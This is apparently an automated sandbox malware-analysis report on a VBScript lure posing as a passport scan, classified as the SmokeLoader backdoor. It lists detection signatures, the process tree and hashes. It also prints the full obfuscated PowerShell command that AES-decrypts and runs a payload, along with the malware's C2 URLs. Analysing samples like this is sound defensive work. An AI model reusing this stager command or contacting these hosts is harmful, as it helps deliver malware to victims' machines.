Edit tour
Windows
Analysis Report
#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs
Overview
General Information
| Sample name: | #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsrenamed because original name is a hash value |
| Original sample name: | -i .vbs |
| Analysis ID: | 1578026 |
| MD5: | dd180ea4a76b4ac987ffc4f4cb42e5ee |
| SHA1: | 645da4bd0a0cc94694fde162126e8dd62208168b |
| SHA256: | ea0a7467efc74d7a947774d83d440426510243bd4b443391f753902bf275c86c |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
SmokeLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6768 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\#U042 1#U043a#U0 430#U043d- #U043a#U04 3e#U043fi# U044f #U04 1f#U0430#U 0441#U043f #U043e#U04 40#U0442.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 2868 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction raNd D($EzfV){r eturn -spl it ($EzfV -replace ' ..', '0x$& ')};$UNmW G = raNdD( '153622473 F3D34B5890 B52ECDE322 F45E48AC8A A1EBE07315 87B2A8D1EB 5D7236A3C8 B617FAE248 09377210FC DAA8256B28 4412DD11EC 0B51122B1E F9F3232128 A30DA87622 5B23A0A210 33A7E42AB9 5CC5ACD28D 3BAC87A3C0 4863F72247 9251796209 1F8B92DF84 D8699F4A63 BB1EACD4E7 F895F70B40 175EDCBD08 58EC7333AE 6A1AB73D0F 0C2C360B38 26EBCACACB 9561C41AF5 24F59C7FE7 200CFE0C18 E7CBE01225 2D4DA348D9 867636DE8B E730977129 6CCEA63DC8 A00F1A6607 291A9D940A C0FBE016E1 469B44FFC9 3FB881EE1B 5B55931B83 474C09BA7D 8326E069F3 0F7EF3AD15 149CE314DE BF42606E20 68557F79F7 7A379EAF73 4C27C2D3B8 54DBC0DC27 52FBB6A8E6 7A31EF7EC6 7BD5A9B6BB C6B643AC64 4B7231B347 88E58522EE 2FF086384D 09C1974CF9 7199996486 FD9081C9C0 3779BC054D 7DBD1AE0F0 3297309921 5905B2991E EDE39D3745 57E6BF7E27 D2284AB231 57862E2CBB 4C7F31D6EA 0F0594CBE9 A410EBAA90 180045174C FB119CD292 B770AC51A7 6BD48FEDA3 76633D5D95 F3C12FCD9A 75FDD9D0DB DE8551877F A8C38E86B9 D006E2A51E 2D327743DB 0EBECEA698 C101441CF1 73D4614D44 DAA2F4802C 84FA83BDCB 67CCFB31C0 7AB202A98C 6B54200BBA EE17899ED1 1E5B03E97A DD428647A4 1B73BF3800 58DE3A0F98 E978F9B83C AB3C28FE01 9C43A7BB0D 040D5CCD70 0B059F3734 BD804AE813 EC4E10D1EA 58FCBB0EC6 C4C8CDE60C D35C6D4012 EECE60D1A1 EB2466BE1E 327B203A6F EADD590E2D 7A77C21870 9D3259C666 B281C8D292 197492CB50 78DC69512F 5FE4EA4467 A62B291A42 BF5576D12E 86AAA0AFEB 464D865F88 ADAAB7D71D EBE3FE860A A8D5C1DC08 F163020FD6 DF7298ABF8 2642D73139 A20C305891 AC189D3EBB 5DE86DD02C ABDB425F68 BC4');$cvl Py=-join [ char[]](([ Security.C ryptograph y.Aes]::Cr eate()).Cr eateDecryp tor((raNdD ('5A456A63 4B52506273 785A52424C 5375')),[b yte[]]::ne w(16)).Tra nsformFina lBlock($UN mWG,0,$UNm WG.Length) ); & $cvlP y.Substrin g(0,3) $cv lPy.Substr ing(3) MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 6704 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
putty.exe (PID: 1664 cmdline: "C:\Users\ user\AppDa ta\Roaming \putty.exe " MD5: C02B57E6771A13513DC087F6B45ADAB0) 
explorer.exe (PID: 4056 cmdline: C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
- daersgt (PID: 2236 cmdline:
C:\Users\u ser\AppDat a\Roaming\ daersgt MD5: C02B57E6771A13513DC087F6B45ADAB0)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| Windows_Trojan_Smokeloader_3687686f | unknown | unknown |
| |
| Click to see the 10 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Click to see the 1 entries | ||||
System Summary |   |
|---|
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: frack113: | ||